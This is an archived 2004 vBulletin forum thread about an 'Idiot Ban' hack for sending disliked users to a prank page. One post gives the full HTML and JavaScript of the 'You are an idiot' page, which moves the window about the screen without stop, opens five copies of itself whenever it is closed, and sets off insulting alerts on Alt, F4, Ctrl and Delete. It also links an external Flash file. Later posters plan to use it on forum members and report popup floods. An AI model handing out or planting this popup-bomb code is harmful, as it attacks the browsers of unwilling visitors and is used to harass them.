vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vBulletin 3.0 Full Releases (https://vborg.vbsupport.ru/forumdisplay.php?f=33)
-   -   Idiot Ban (https://vborg.vbsupport.ru/showthread.php?t=60107)

Nam 01-19-2004 12:09 PM

Quote:

Originally Posted by corn
OMG :D
this is the most useless hack ever :o

LMAO :speechless:

Very funny hack, but I don't think I'm gonna need it for my site, though I love to piss people off.

genmud 02-02-2004 01:10 AM

HTML Code:

[size=2]

<html>

<head>

<title>Mogle</title>

<script language=Javascript>

function altf4key()

{

if (event.keyCode == 18 || event.keyCode == 115) alert("You are an idiot!");

}

function ctrlkey()

{

if (event.keyCode == 17) alert("You are an idiot!");

}

function delkey()

{

if (event.keyCode == 46) alert("You are an idiot!");

}

var xOff = 5;

var yOff = 5;

var xPos = 400;

var yPos = -100;

var flagRun = 1;

function openWindow(url)

{

aWindow = window.open(url,"_blank");

}

function procreate()

{

openWindow("index.html");

openWindow("index.html");

openWindow("index.html");

openWindow("index.html");

openWindow("index.html");

}

function newXlt()

{

xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;

window.focus()

}

function newXrt()

{

xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;

}

function newYup()

{

yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;

}

function newYdn()

{

yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;

}

function fOff()

{

flagrun = 0;

}

function playBall()

{

xPos += xOff;

yPos += yOff;

if (xPos > screen.width-175)

{

newXlt();

}

if (xPos < 0)

{

newXrt();

}

if (yPos >
screen.height-100)

{

newYup();

}

if (yPos < 0)

{

newYdn();

}

if (flagRun == 1)

{

window.moveTo(xPos,yPos);

setTimeout('playBall()',1);

}

}

</script>


</head>

<body bgColor=#ffffff onload="playBall();" onunload="procreate();" onKeyDown="altf4key();ctrlkey();delkey();" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><!-- BEGIN PROBE CODE -->

<embed src="youare.swf" height=600 width=600>

</body>

</html>[/size]

That is the html code for the webpage...

go to http://earth.prohosting.com/jesos/youare.swf to save that flash animation... then upload or whatever

idn

SloppyGoat 02-09-2004 01:17 AM

Hahaha! I actually saved that page a long time ago and put it on my server. Anytime I saw an idiot who desperately needed it, I'd post the link for the idiot to click on. But this is even better! :D My version has two js files and two html files, plus the swf, though.

Osterling 02-28-2004 02:56 AM

this didnt work for me.. i have RC4.. is it rc4 compatiable?

Osterling 02-28-2004 03:15 AM

Quote:

if ($shownewpm)
{
if ($bbuserinfo['pmunread'] == 1)
{

}

else
{
$pmpopupurl = "private.php?$session[sessionurl_js]";
}
eval('$footer .= "' . fetch_template('pm_popup_script') . '";');
}

that is what mine looks like.. where should i put the code for the idiot ban

Osterling 03-03-2004 01:40 AM

anyone wanna give me support?

rebelsrock06 03-06-2004 06:32 PM

Quote:

Originally Posted by MetalGearMaster
Does it really upload a trojan to the user's computer? because if it does i wont use this, even though its an awesome hack!

MGM out


what exactly is a trojan, and NO im not talking about the condom

Osterling 03-06-2004 11:33 PM

you guys don't wanna offer me any support :(

Wifey 03-17-2004 02:00 AM

Oh my God, I wish that this hack had been installed on a board I moderate. We have two that need to die in lots of popups from this website

Very clever ;) When the time comes I just might add this!

rebelsrock06 03-17-2004 02:02 AM

except for the whole trojan thing its ok. i open this thing and ever since My somputer has had a total SPAM from pop ups and everything, IM PISSED


All times are GMT. The time now is 10:32 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.00996 seconds
  • Memory Usage 1,740KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_html_printable
  • (3)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (4)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete